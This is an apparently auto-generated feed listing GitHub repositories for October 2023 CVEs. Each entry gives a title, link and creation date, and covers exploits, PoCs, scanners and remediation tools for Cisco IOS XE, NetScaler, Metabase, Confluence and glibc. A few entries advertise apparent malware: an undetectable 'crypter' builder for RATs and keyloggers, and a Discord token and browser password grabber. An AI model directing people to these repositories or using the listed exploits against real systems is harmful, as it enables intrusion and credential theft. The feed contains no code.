**no description** : [NguyenCongHaiNam/Research-CVE-2016-5195](https://github.com/NguyenCongHaiNam/Research-CVE-2016-5195) create time: 2023-10-26T01:54:49Z

**no description** : [IceBreakerCode/CVE-2023-4966](https://github.com/IceBreakerCode/CVE-2023-4966) create time: 2023-10-25T21:34:43Z

**no description** : [IceBreakerCode/CVE-2023-20198](https://github.com/IceBreakerCode/CVE-2023-20198) create time: 2023-10-25T21:15:58Z

**no description** : [IceBreakerCode/CVE-2023-4966](https://github.com/IceBreakerCode/CVE-2023-4966) create time: 2023-10-25T21:10:16Z

**no description** : [ohlawd/CVE-2023-20198](https://github.com/ohlawd/CVE-2023-20198) create time: 2023-10-25T21:02:22Z

**Docs on the Vulnerability CVE-2019-1663 (Cisco Routers)** : [StealYourCode/CVE-2019-1663](https://github.com/StealYourCode/CVE-2019-1663) create time: 2023-10-25T18:52:47Z

**Proof Of Concept for te NetScaler Vuln** : [mlynchcogent/CVE-2023-4966-POC](https://github.com/mlynchcogent/CVE-2023-4966-POC) create time: 2023-10-25T12:37:56Z

**Demonstration of CVE-2022-0482** : [OwlsNightCatch/CVE-2022-0482-demo](https://github.com/OwlsNightCatch/CVE-2022-0482-demo) create time: 2023-10-25T16:34:53Z

**Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection** : [Red-Amber/CVE-2023-38646](https://github.com/Red-Amber/CVE-2023-38646) create time: 2023-10-25T17:10:53Z

**CVE-2023-22074** : [emad-almousa/CVE-2023-22074](https://github.com/emad-almousa/CVE-2023-22074) create time: 2023-10-25T15:26:17Z

**no description** : [Twil4/CVE-2023-29357](https://github.com/Twil4/CVE-2023-29357) create time: 2023-10-25T12:34:22Z

**Bash script to check if kernel is vulnerable** : [ayushx007/CVE-2022-0847-dirty-pipe-checker](https://github.com/ayushx007/CVE-2022-0847-dirty-pipe-checker) create time: 2023-10-25T11:28:22Z

**Looney Tunables Local privilege escalation (CVE-2023-4911) workshop** : [KernelKrise/CVE-2023-4911](https://github.com/KernelKrise/CVE-2023-4911) create time: 2023-10-25T11:59:34Z

**no description** : [Trinadh465/packages_apps_Settings_CVE-2023-21086](https://github.com/Trinadh465/packages_apps_Settings_CVE-2023-21086) create time: 2023-10-25T11:42:32Z

**no description** : [Trinadh465/packages_apps_Settings_CVE-2023-21086](https://github.com/Trinadh465/packages_apps_Settings_CVE-2023-21086) create time: 2023-10-25T11:03:27Z

**no description** : [nidhi7598/frameworks_base_AOSP_06_r22_CVE-2022-20338](https://github.com/nidhi7598/frameworks_base_AOSP_06_r22_CVE-2022-20338) create time: 2023-10-25T09:07:54Z

**Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).** : [Pushkarup/CVE-2023-23752](https://github.com/Pushkarup/CVE-2023-23752) create time: 2023-10-25T08:53:12Z

**no description** : [abdullah098/CVE-2020-0796-Scanner](https://github.com/abdullah098/CVE-2020-0796-Scanner) create time: 2023-10-25T07:58:03Z

**no description** : [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094) create time: 2023-10-25T07:54:39Z

**Proof Of Concept for te NetScaler Vuln** : [senpaisamp/CVE-2023-4966-POC](https://github.com/senpaisamp/CVE-2023-4966-POC) create time: 2023-10-25T07:17:54Z

**no description** : [mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner](https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner) create time: 2023-10-25T07:13:59Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097) create time: 2023-10-25T07:08:56Z

**Citrix CVE-2023-4966 from assetnote modified for parallel and file handling** : [dinosn/citrix_cve-2023-4966](https://github.com/dinosn/citrix_cve-2023-4966) create time: 2023-10-25T04:15:17Z

**CVE-2019-10149** : [hyim0810/CVE-2019-10149](https://github.com/hyim0810/CVE-2019-10149) create time: 2023-10-25T02:25:17Z

**CVE-2018-7848** : [yanissec/CVE-2018-7848](https://github.com/yanissec/CVE-2018-7848) create time: 2023-10-25T02:13:21Z

**no description** : [rwincey/CVE-2021-27198](https://github.com/rwincey/CVE-2021-27198) create time: 2023-10-25T01:22:07Z

**CVE-2023-4911 (Looney Tunables) explained** : [KernelKrise/Looney-Tunables-LPE-workshop-CVE-2023-4911-](https://github.com/KernelKrise/Looney-Tunables-LPE-workshop-CVE-2023-4911-) create time: 2023-10-24T21:55:59Z

**A PoC and Exploit for CVE 2022-29464** : [Pushkarup/CVE-2022-29464](https://github.com/Pushkarup/CVE-2022-29464) create time: 2023-10-24T18:54:09Z

**CVE-2023-37478 showcases how a difference in npm and pnpm install packages that could be exploited by a well crafted tar.gz packge. This repo shows a demo.** : [TrevorGKann/CVE-2023-37478_npm_vs_pnpm](https://github.com/TrevorGKann/CVE-2023-37478_npm_vs_pnpm) create time: 2023-10-24T18:32:30Z

**Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.** : [Chocapikk/CVE-2023-4966](https://github.com/Chocapikk/CVE-2023-4966) create time: 2023-10-24T17:19:32Z

**Check a target IP for CVE-2023-20198** : [kacem-expereo/CVE-2023-20198](https://github.com/kacem-expereo/CVE-2023-20198) create time: 2023-10-24T09:36:37Z

**no description** : [r10lab/CVE-2022-23131](https://github.com/r10lab/CVE-2022-23131) create time: 2023-10-24T08:11:06Z

**no description** : [hoanganh2k/cve-2018-5333](https://github.com/hoanganh2k/cve-2018-5333) create time: 2023-10-24T07:02:35Z

**CVE-2018-7846** : [yanissec/CVE-2018-7846](https://github.com/yanissec/CVE-2018-7846) create time: 2023-10-24T02:20:41Z

**no description** : [phucodeexp/CVE-2023-30033](https://github.com/phucodeexp/CVE-2023-30033) create time: 2023-10-24T02:23:03Z

**CVE-2023-38831 is an RCE in WinRAR (<6.23)** : [kehrijksen/CVE-2023-38831](https://github.com/kehrijksen/CVE-2023-38831) create time: 2023-10-24T01:14:03Z

**Python script get image from Hikvision camera with CVE-2017-7921 vulnerability** : [AnonkiGroup/AnonHik](https://github.com/AnonkiGroup/AnonHik) create time: 2023-10-23T22:48:11Z

**CVE-2013-4786 Go exploitation tool** : [fin3ss3g0d/CosmicRakp](https://github.com/fin3ss3g0d/CosmicRakp) create time: 2023-10-23T20:01:37Z

**This is a webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273** : [Shadow0ps/CVE-2023-20198-Scanner](https://github.com/Shadow0ps/CVE-2023-20198-Scanner) create time: 2023-10-23T19:25:29Z

**no description** : [N1k0la-T/CVE-2023-36745](https://github.com/N1k0la-T/CVE-2023-36745) create time: 2023-10-23T19:06:36Z

**Exploit for CVE-2023-36802 targeting MSKSSRV.SYS driver** : [Nero22k/cve-2023-36802](https://github.com/Nero22k/cve-2023-36802) create time: 2023-10-23T18:33:41Z

**A PoC for CVE 2023-20198** : [Pushkarup/CVE-2023-20198](https://github.com/Pushkarup/CVE-2023-20198) create time: 2023-10-23T16:04:23Z

**CVE-2022-38601** : [jet-pentest/CVE-2022-38601](https://github.com/jet-pentest/CVE-2022-38601) create time: 2023-10-23T13:34:53Z

**Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure** : [RandomRobbieBF/CVE-2023-46197](https://github.com/RandomRobbieBF/CVE-2023-46197) create time: 2023-10-23T12:38:37Z

**no description** : [MMarch7/weblogic_CVE-2023-21839_POC-EXP](https://github.com/MMarch7/weblogic_CVE-2023-21839_POC-EXP) create time: 2023-10-23T11:36:29Z

**Repository contains description for CVE-2023-35794 discovered by Dodge Industrial Team for Dodge OPTIFY platfrom.** : [Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking](https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking) create time: 2023-10-23T09:51:34Z

**CVE-2018-7845** : [yanissec/CVE-2018-7845](https://github.com/yanissec/CVE-2018-7845) create time: 2023-10-23T07:42:06Z

**检测域内常见一把梭漏洞,包括:NoPac、ZeroLogon、CVE-2022-26923、PrintNightMare** : [evilashz/PIGADVulnScanner](https://github.com/evilashz/PIGADVulnScanner) create time: 2023-10-17T06:29:44Z

**CVE-2023-22515 (Confluence Broken Access Control Exploit)** : [joaoviictorti/CVE-2023-22515](https://github.com/joaoviictorti/CVE-2023-22515) create time: 2023-10-22T23:37:56Z

**no description** : [entr0pie/CVE-2023-38646](https://github.com/entr0pie/CVE-2023-38646) create time: 2023-10-22T23:24:28Z

**Unlimited Build Files Unlimited Spread Files Small File size Compatible with RATs, Keyloggers, Botnets, or any other exe** : [GameProfRcs/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/GameProfRcs/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-10-22T15:23:17Z

**no description** : [banyaksepuh/Mass-CVE-2021-3129-Scanner](https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner) create time: 2023-10-22T14:25:38Z

**no description** : [haingn/HIK-CVE-2021-36260-Exploit](https://github.com/haingn/HIK-CVE-2021-36260-Exploit) create time: 2023-10-22T14:09:18Z

**no description** : [haingn/LoHongCam-CVE-2021-33044](https://github.com/haingn/LoHongCam-CVE-2021-33044) create time: 2023-10-22T14:02:49Z

**no description** : [Nielk74/CVE-2023-38831](https://github.com/Nielk74/CVE-2023-38831) create time: 2023-10-21T17:03:48Z

**no description** : [truonghuuphuc/CVE-2023-42120-Poc](https://github.com/truonghuuphuc/CVE-2023-42120-Poc) create time: 2023-10-21T15:06:51Z

**cve-2023-22515的python利用脚本** : [DsaHen/cve-2023-22515-exp](https://github.com/DsaHen/cve-2023-22515-exp) create time: 2023-10-21T13:59:16Z

**no description** : [MMarch7/weblogic_CVE-2023-21931_POC-EXP](https://github.com/MMarch7/weblogic_CVE-2023-21931_POC-EXP) create time: 2023-10-21T07:30:24Z

**CVE-2023-5360 Auto Shell Upload WordPress Royal Elementor 1.3.78 Shell Upload** : [sagsooz/CVE-2023-5360](https://github.com/sagsooz/CVE-2023-5360) create time: 2023-10-21T10:51:08Z

**no description** : [ShivamDey/Samba-CVE-2007-2447-Exploit](https://github.com/ShivamDey/Samba-CVE-2007-2447-Exploit) create time: 2023-10-21T05:43:04Z

**no description** : [ShivamDey/CVE-2021-23017](https://github.com/ShivamDey/CVE-2021-23017) create time: 2023-10-21T04:24:02Z

**CISCO CVE POC SCRIPT** : [sohaibeb/CVE-2023-20198](https://github.com/sohaibeb/CVE-2023-20198) create time: 2023-10-20T23:34:12Z

**testing cve-2023-41993-test** : [Mangaia/cve-test](https://github.com/Mangaia/cve-test) create time: 2023-10-20T22:04:40Z

**To exploit SQL injection vulnerability** : [ashangp923/CVE-2017-7410](https://github.com/ashangp923/CVE-2017-7410) create time: 2023-10-20T17:58:28Z

**To exploit XSS injection** : [ashangp923/CVE-2018-10097](https://github.com/ashangp923/CVE-2018-10097) create time: 2023-10-20T18:06:19Z

**To find HTML injection and XSS** : [ashangp923/CVE-2023-3971](https://github.com/ashangp923/CVE-2023-3971) create time: 2023-10-20T18:11:22Z

**1vere$k POC on the CVE-2023-20198** : [iveresk/cve-2023-20198](https://github.com/iveresk/cve-2023-20198) create time: 2023-10-20T16:01:17Z

**RCE Exploit for CVE-2023-38646** : [AnvithLobo/CVE-2023-38646](https://github.com/AnvithLobo/CVE-2023-38646) create time: 2023-10-20T15:21:08Z

**VMware Aria Operations for Logs CVE-2023-34051** : [horizon3ai/CVE-2023-34051](https://github.com/horizon3ai/CVE-2023-34051) create time: 2023-10-20T14:59:45Z

**Joomla Unauthenticated Information Disclosure (CVE-2023-23752) exploit** : [AlissoftCodes/CVE-2023-23752](https://github.com/AlissoftCodes/CVE-2023-23752) create time: 2023-10-20T13:32:28Z

**WAGO系统远程代码执行漏洞(CVE-2023-1698)** : [thedarknessdied/WAGO-CVE-2023-1698](https://github.com/thedarknessdied/WAGO-CVE-2023-1698) create time: 2023-10-20T12:15:39Z

**Nexter <= 2.0.3 - Authenticated (Subscriber+) SQL Injection via 'to' and 'from'** : [RandomRobbieBF/CVE-2023-45657](https://github.com/RandomRobbieBF/CVE-2023-45657) create time: 2023-10-20T12:01:15Z

**CVE-2023-20198 straight RCE without implant** : [m474r5/CVE-2023-20198-RCE](https://github.com/m474r5/CVE-2023-20198-RCE) create time: 2023-10-20T11:30:44Z

**no description** : [yTxZx/CVE-2023-28432](https://github.com/yTxZx/CVE-2023-28432) create time: 2023-10-20T10:20:10Z

**CVE-2018-7844** : [yanissec/CVE-2018-7844](https://github.com/yanissec/CVE-2018-7844) create time: 2023-10-20T09:43:56Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963) create time: 2023-10-20T09:11:00Z

**CVE-2023-42442** : [C1ph3rX13/CVE-2023-42442](https://github.com/C1ph3rX13/CVE-2023-42442) create time: 2023-10-20T08:33:17Z

**Confluence后台rce** : [youcannotseemeagain/CVE-2023-22515_RCE](https://github.com/youcannotseemeagain/CVE-2023-22515_RCE) create time: 2023-10-20T08:23:47Z

**no description** : [reket99/Cisco_CVE-2023-20198](https://github.com/reket99/Cisco_CVE-2023-20198) create time: 2023-10-20T05:28:40Z

**no description** : [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134) create time: 2023-10-20T07:42:36Z

**no description** : [yTxZx/CVE-2023-23752](https://github.com/yTxZx/CVE-2023-23752) create time: 2023-10-20T08:17:48Z

**A Proof of Concept of Spring AMQP Deserialization Vulnerability (CVE-2023-34050)** : [X1r0z/spring-amqp-deserialization](https://github.com/X1r0z/spring-amqp-deserialization) create time: 2023-10-20T05:46:15Z

**no description** : [deIndra/CVE-2023-1698](https://github.com/deIndra/CVE-2023-1698) create time: 2023-10-20T05:40:32Z

**PoC for CVE-2023-36802 Microsoft Kernel Streaming Service Proxy** : [x0rb3l/CVE-2023-36802-MSKSSRV-LPE](https://github.com/x0rb3l/CVE-2023-36802-MSKSSRV-LPE) create time: 2023-10-20T02:05:27Z

**CVE-2023-36802 ITW case** : [4zur-0312/CVE-2023-36802](https://github.com/4zur-0312/CVE-2023-36802) create time: 2023-10-19T23:34:37Z

**Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver** : [exotikcheat/cve-2023-29360](https://github.com/exotikcheat/cve-2023-29360) create time: 2023-10-19T19:56:57Z

**no description** : [harry935/CVE-2023-45992](https://github.com/harry935/CVE-2023-45992) create time: 2023-10-19T15:26:59Z

**no description** : [RubXkuB/PoC-Metabase-CVE-2021-41277](https://github.com/RubXkuB/PoC-Metabase-CVE-2021-41277) create time: 2023-04-24T16:34:13Z

**no description** : [nidhi7598/Frameworks_native_AOSP_10_r33_CVE-2023-21118](https://github.com/nidhi7598/Frameworks_native_AOSP_10_r33_CVE-2023-21118) create time: 2023-10-19T10:27:42Z

**fork on Betep0k/CVE-2021-25741/fork whose images is useless and test on metarget** : [cdxiaodong/CVE-2021-25741](https://github.com/cdxiaodong/CVE-2021-25741) create time: 2023-10-19T07:26:11Z

**no description** : [leekenghwa/CVE-2023-46003](https://github.com/leekenghwa/CVE-2023-46003) create time: 2023-10-19T08:17:53Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21109](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21109) create time: 2023-10-19T06:53:50Z

**Adtran SR400ac ping Command Injection Remote Code Execution Vulnerability** : [warber0x/CVE-2023-38120](https://github.com/warber0x/CVE-2023-38120) create time: 2023-10-19T04:00:47Z

**Nmap NSE script for cve-2021-21974** : [hateme021202/cve-2021-21974](https://github.com/hateme021202/cve-2021-21974) create time: 2023-10-19T02:03:44Z

**no description** : [wushigudan/CVE-2023-33517](https://github.com/wushigudan/CVE-2023-33517) create time: 2023-10-19T02:08:39Z

**no description** : [codeb0ss/CVE-2023-44227-PoC](https://github.com/codeb0ss/CVE-2023-44227-PoC) create time: 2023-10-19T01:33:08Z

**no description** : [codeb0ss/CVE-2023-5601-PoC](https://github.com/codeb0ss/CVE-2023-5601-PoC) create time: 2023-10-19T00:47:06Z

**no description** : [20dani09/CVE-2019-9978](https://github.com/20dani09/CVE-2019-9978) create time: 2023-10-18T19:44:02Z

**Blind SSRF in umputun/remark42 <= 1.12.1** : [jet-pentest/CVE-2023-45966](https://github.com/jet-pentest/CVE-2023-45966) create time: 2023-10-18T18:18:25Z

**Remediate CVE_2023_20198 on Cisco IOS-XE devices.** : [alekos3/CVE_2023_20198_Remediator](https://github.com/alekos3/CVE_2023_20198_Remediator) create time: 2023-10-18T17:45:59Z

**Cisco IOS XE exploit CVE-2023-20198** : [exp166/CVE-2023-20198](https://github.com/exp166/CVE-2023-20198) create time: 2023-10-18T17:36:04Z

**no description** : [ditekshen/ansible-cve-2023-20198](https://github.com/ditekshen/ansible-cve-2023-20198) create time: 2023-10-18T16:49:51Z

**This script can identify if Cisco IOS XE devices are vulnerable to CVE-2023-20198** : [alekos3/CVE_2023_20198_Detector](https://github.com/alekos3/CVE_2023_20198_Detector) create time: 2023-10-18T15:04:57Z

**no description** : [valentin-panov/CVE-2023-45857](https://github.com/valentin-panov/CVE-2023-45857) create time: 2023-10-18T12:19:34Z

**CVE-2023-20198 PoC (!)** : [Tounsi007/CVE-2023-20198](https://github.com/Tounsi007/CVE-2023-20198) create time: 2023-10-18T08:50:49Z

**CVE-2018-7843** : [yanissec/CVE-2018-7843](https://github.com/yanissec/CVE-2018-7843) create time: 2023-10-18T09:58:32Z

**no description** : [cert-orangecyberdefense/Cisco_CVE-2023-20198](https://github.com/cert-orangecyberdefense/Cisco_CVE-2023-20198) create time: 2023-10-18T08:39:57Z

**no description** : [cli-ish/CVE-2023-5540](https://github.com/cli-ish/CVE-2023-5540) create time: 2023-10-18T07:58:33Z

**no description** : [cli-ish/CVE-2023-5539](https://github.com/cli-ish/CVE-2023-5539) create time: 2023-10-18T07:58:25Z

**no description** : [cli-ish/CVE-2023-28330](https://github.com/cli-ish/CVE-2023-28330) create time: 2023-10-18T07:58:16Z

**no description** : [cli-ish/CVE-2023-28329](https://github.com/cli-ish/CVE-2023-28329) create time: 2023-10-18T07:58:04Z

**Checker for CVE-2023-20198 , Not a full POC Just checks the implementation and detects if hex is in response or not** : [JoyGhoshs/CVE-2023-20198](https://github.com/JoyGhoshs/CVE-2023-20198) create time: 2023-10-18T07:53:29Z

**Detect and mitigate the critical CVE-2023-20198 vulnerability in Cisco IOS XE Software. Our Python-based scanner helps security professionals identify potential implants and secure their systems. Scan for active exploitation, detect implants, and generate detailed logs.** : [moonrockcowboy/CVE-2023-20198-scanner](https://github.com/moonrockcowboy/CVE-2023-20198-scanner) create time: 2023-10-18T03:12:40Z

**CVE-2023-20198 & 0Day Implant Scanner** : [ZephrFish/Cisco-IOS-XE-Scanner](https://github.com/ZephrFish/Cisco-IOS-XE-Scanner) create time: 2023-10-17T22:41:14Z

**no description** : [emomeni/Simple-Ansible-for-CVE-2023-20198](https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198) create time: 2023-10-17T18:46:21Z

**CVE-2023-41993** : [0x06060606/CVE-2023-41993](https://github.com/0x06060606/CVE-2023-41993) create time: 2023-10-16T20:34:02Z

**no description** : [Aakash9111/CVE-2023-38646-ReverseShell](https://github.com/Aakash9111/CVE-2023-38646-ReverseShell) create time: 2023-10-17T16:07:25Z

**cisco-CVE-2023-20198-tester** : [securityphoenix/cisco-CVE-2023-20198-tester](https://github.com/securityphoenix/cisco-CVE-2023-20198-tester) create time: 2023-10-17T15:44:01Z

**CVE-2023-20198 PoC (!)** : [d0rb/CVE-2023-20198](https://github.com/d0rb/CVE-2023-20198) create time: 2023-10-17T13:59:48Z

**no description** : [ValentinPundikov/poc-CVE-2023-32784](https://github.com/ValentinPundikov/poc-CVE-2023-32784) create time: 2023-10-17T13:17:08Z

**CVE-2018-7842** : [yanissec/CVE-2018-7842](https://github.com/yanissec/CVE-2018-7842) create time: 2023-10-17T12:19:27Z

**no description** : [S4muraiMelayu1337/CVE-2023-29489](https://github.com/S4muraiMelayu1337/CVE-2023-29489) create time: 2023-10-17T11:18:53Z

**testing poc** : [hrtowii/cve-2023-41993-test](https://github.com/hrtowii/cve-2023-41993-test) create time: 2023-10-16T15:43:50Z

**exploit CVE-2023-20198** : [pypcod/CVE-2023-20198](https://github.com/pypcod/CVE-2023-20198) create time: 2023-10-17T10:37:53Z

**Proxyshell for Exploiting CVE-2021-34473** : [f4alireza/CVE](https://github.com/f4alireza/CVE) create time: 2023-10-17T08:38:08Z

**socks5 heap buffer overflow** : [d0rb/CVE-2023-38545](https://github.com/d0rb/CVE-2023-38545) create time: 2023-10-17T09:03:15Z

**RumbleTalk Live Group Chat <= 6.1.9 - Missing Authorization via handleRequest** : [RandomRobbieBF/CVE-2023-45828](https://github.com/RandomRobbieBF/CVE-2023-45828) create time: 2023-10-17T08:41:54Z

**Social Media Share Buttons & Social Sharing Icons <= 2.8.5 - Information Exposure** : [RandomRobbieBF/CVE-2023-5070](https://github.com/RandomRobbieBF/CVE-2023-5070) create time: 2023-10-17T08:19:09Z

**CVE-2023-20198 Checkscript** : [Atea-Redteam/CVE-2023-20198](https://github.com/Atea-Redteam/CVE-2023-20198) create time: 2023-10-17T08:00:18Z

**Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.** : [chaudharyarjun/LooneyPwner](https://github.com/chaudharyarjun/LooneyPwner) create time: 2023-10-17T07:44:16Z

**Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.** : [birdm4nw/CVE-2023-38646](https://github.com/birdm4nw/CVE-2023-38646) create time: 2023-10-17T07:43:58Z

**no description** : [deIndra/CVE-2023-36076](https://github.com/deIndra/CVE-2023-36076) create time: 2023-10-17T07:37:24Z

**no description** : [raystr-atearedteam/CVE-2023-20198-checker](https://github.com/raystr-atearedteam/CVE-2023-20198-checker) create time: 2023-10-17T07:35:50Z

**Python exploit for vsftpd 2.3.4 - Backdoor Command Execution** : [vaishnavucv/CVE-2011-2523](https://github.com/vaishnavucv/CVE-2011-2523) create time: 2023-10-16T21:00:27Z

**This repository has the sole purpose of rewriting the CVE-2019-9053 script, which in the original publication is written in Python 2.7. I will be using Python 3.** : [fernandobortotti/CVE-2019-9053](https://github.com/fernandobortotti/CVE-2019-9053) create time: 2023-10-16T20:17:38Z

**A proof of concept for testing CVE-2023-38545 against local curl** : [bcdannyboy/CVE-2023-38545](https://github.com/bcdannyboy/CVE-2023-38545) create time: 2023-10-16T15:55:32Z

**no description** : [DcardosoGH/CVE-2023-27163-Maltrail-0.53-RCE](https://github.com/DcardosoGH/CVE-2023-27163-Maltrail-0.53-RCE) create time: 2023-10-16T15:44:15Z

**Fortinet unauthenticated RCE POC and writeup...** : [m474r5/CVE-2023-27997-RCE](https://github.com/m474r5/CVE-2023-27997-RCE) create time: 2023-10-16T13:37:13Z

**Test repo pour la CVE-2023-42793 de TeamCity** : [LeHeron/TC_test](https://github.com/LeHeron/TC_test) create time: 2023-10-16T12:52:17Z

**Challenge based on CVE-2021-22204 where users send a malicious file to a web application to gain RCE** : [battleofthebots/dejavu](https://github.com/battleofthebots/dejavu) create time: 2023-07-25T13:52:01Z

**CVE-2022-1388 - F5 Router RCE Replica** : [battleofthebots/refresh](https://github.com/battleofthebots/refresh) create time: 2023-08-01T18:12:52Z

**Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only** : [studiogangster/CVE-2023-44487](https://github.com/studiogangster/CVE-2023-44487) create time: 2023-10-16T11:07:50Z

**CVE-2023-38545 POC for the curl command line tool** : [dbrugman/CVE-2023-38545-POC](https://github.com/dbrugman/CVE-2023-38545-POC) create time: 2023-10-16T10:04:19Z

**Security Vulnerability - SECUDOS Qiata** : [vianic/CVE-2023-40361](https://github.com/vianic/CVE-2023-40361) create time: 2023-10-16T08:49:25Z

**CVE-2017-13286 Poc(can not use)** : [UmVfX1BvaW50/CVE-2017-13286](https://github.com/UmVfX1BvaW50/CVE-2017-13286) create time: 2023-10-16T05:03:45Z

**锐捷RG-EW1200G登录绕过(CVE-2023-4415)** : [thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVS-2023-4415-](https://github.com/thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVS-2023-4415-) create time: 2023-10-16T05:08:06Z

**orangescrum 1.8.0 - LFI to Remote Command Execution RCE (unauthenticated)** : [g1thub3r1st4/CVE-2021-44909](https://github.com/g1thub3r1st4/CVE-2021-44909) create time: 2023-10-16T03:54:23Z

**no description** : [Doc0x1/CVE-2019-9053-Python3](https://github.com/Doc0x1/CVE-2019-9053-Python3) create time: 2023-10-16T01:09:13Z

**Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.** : [n3rada/DirtyPipe](https://github.com/n3rada/DirtyPipe) create time: 2023-10-15T20:13:11Z

**Mass CVE-2023-23752 scanner** : [k0valskia/CVE-2023-23752](https://github.com/k0valskia/CVE-2023-23752) create time: 2023-10-15T15:30:14Z

**no description** : [Argonx21/CVE-2023-24517](https://github.com/Argonx21/CVE-2023-24517) create time: 2023-10-15T14:55:12Z

**no description** : [po6ix/POC-for-CVE-2023-41993](https://github.com/po6ix/POC-for-CVE-2023-41993) create time: 2023-10-15T12:14:18Z

**no description** : [m474r5/CVE-2023-27997-findings](https://github.com/m474r5/CVE-2023-27997-findings) create time: 2023-10-15T09:19:00Z

**no description** : [m474r5/CVE-2023-27997-POC](https://github.com/m474r5/CVE-2023-27997-POC) create time: 2023-10-15T09:18:17Z

**Mass Exploit - CVE-2023-45603 - Wordpress/plugin/user-submitted-posts < Unauthenticated Arbitrary File Upload/Exploit** : [codeb0ss/CVE-2023-45603-PoC](https://github.com/codeb0ss/CVE-2023-45603-PoC) create time: 2023-10-15T01:57:25Z

**Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)** : [Pyr0sec/CVE-2023-38646](https://github.com/Pyr0sec/CVE-2023-38646) create time: 2023-10-15T01:29:37Z

**Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s File grabber (Documents, Images, Source codes, Databases, USB)** : [GameProfOrg/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/GameProfOrg/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-10-14T21:54:34Z

**package commonly used by web services to process Exploit JPG File. One of the vulnerabilities can lead to remote code execution (RCE) if you process user submitted JPG. The exploit for this vulnerability is being used in the wild.Why Are You Disclosing A Exploit JPG** : [GameProfOrg/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/GameProfOrg/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-10-14T21:52:05Z

**exploit for CVE-2023-3710** : [CwEeR313/CVE-2023-3710](https://github.com/CwEeR313/CVE-2023-3710) create time: 2023-10-14T18:31:51Z

**no description** : [itsAptx/CVE-2023-45471](https://github.com/itsAptx/CVE-2023-45471) create time: 2023-10-14T15:20:37Z

**no description** : [asepsaepdin/CVE-2023-38646](https://github.com/asepsaepdin/CVE-2023-38646) create time: 2023-10-14T15:56:18Z

**no description** : [Mahdi22228/CVE-2023-3710](https://github.com/Mahdi22228/CVE-2023-3710) create time: 2023-10-14T12:18:15Z

**JumpServer 堡垒机未授权综合漏洞利用, CVE-2023-42442 / CVE-2023-42820** : [tarimoe/blackjump](https://github.com/tarimoe/blackjump) create time: 2023-10-14T09:35:07Z

**mooSocial v3.1.8 is vulnerable to cross-site scripting on search function.** : [ahrixia/CVE-2023-45542](https://github.com/ahrixia/CVE-2023-45542) create time: 2023-09-26T12:59:31Z

**PoC for CVE-2023-4911 LooneyTuneables** : [guffre/CVE-2023-4911](https://github.com/guffre/CVE-2023-4911) create time: 2023-10-14T02:24:52Z

**Tool for testing mitigations and exposure to Rapid Reset DDoS (CVE-2023-44487)** : [secengjeff/rapidresetclient](https://github.com/secengjeff/rapidresetclient) create time: 2023-10-13T23:55:32Z

**Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php** : [Pegasus0xx/CVE-2023-43144](https://github.com/Pegasus0xx/CVE-2023-43144) create time: 2023-10-13T18:19:22Z

**no description** : [Vagebondcur/IMAGE-MAGICK-CVE-2022-44268](https://github.com/Vagebondcur/IMAGE-MAGICK-CVE-2022-44268) create time: 2023-10-13T15:43:49Z

**PoC for the ThemeBleed Windows 11 CVE-2023-38146 written in python using impacket** : [Jnnshschl/CVE-2023-38146](https://github.com/Jnnshschl/CVE-2023-38146) create time: 2023-10-13T15:33:42Z

**iveresk-CVE-2023-22515** : [iveresk/CVE-2023-22515](https://github.com/iveresk/CVE-2023-22515) create time: 2023-10-13T08:36:21Z

**Explaining how to exploit CVE-2023-30861** : [JawadPy/CVE-2023-30861-Exploit](https://github.com/JawadPy/CVE-2023-30861-Exploit) create time: 2023-10-13T08:27:03Z

**Confluence Broken Access Control** : [Vulnmachines/confluence-cve-2023-22515](https://github.com/Vulnmachines/confluence-cve-2023-22515) create time: 2023-10-13T08:19:07Z

